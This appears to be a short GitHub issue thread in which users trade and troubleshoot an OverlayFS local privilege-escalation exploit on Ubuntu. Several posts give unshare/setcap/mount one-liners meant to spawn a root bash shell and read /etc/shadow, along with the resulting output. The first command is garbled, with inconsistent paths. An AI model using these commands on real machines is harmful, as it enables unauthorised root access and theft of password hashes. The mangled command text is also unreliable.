Open scotch123 opened 9 months ago
Try:
unshare -rm sh -c "mkdir luwm && cp /u/b/p3 l/; setcap cap_setuid+ep /python3; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=wm && touch m/;" && u/python3 -c 'import os; import pty; os.setuid(0); pty.spawn("/bin/bash")'
You will get a interactive Shell as root user, test the permissions again
Hey @scotch123 . Facing the same issue. Apparently I get a root shell and it says I'm root. The users and the group names of all the files are getting changed to nobody and nogroup respectively. That is why none of the files that were owned by root prior to the priv esc doesn't cat out post becoming root after the exploitation.
Why it shows root but it hasn't full access?
Tried this exploit but I'm not fully root..
advance@developer:/tmp$ unshare -rm sh -c "mkdir l u w m && cp /u/b/p3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/; u/python3 -c 'import os;os.setuid(0);os.system("id;cat /etc/shadow")'";rm -rf l u w m uid=0(root) gid=0(root) groups=0(root),65534(nogroup) cat: /etc/shadow: Permission denied
Also I've tried on another 5.15 Ubuntu, it got root everywhere but actually it's not root... permission denied for cat /etc/shadow. What's wrong ?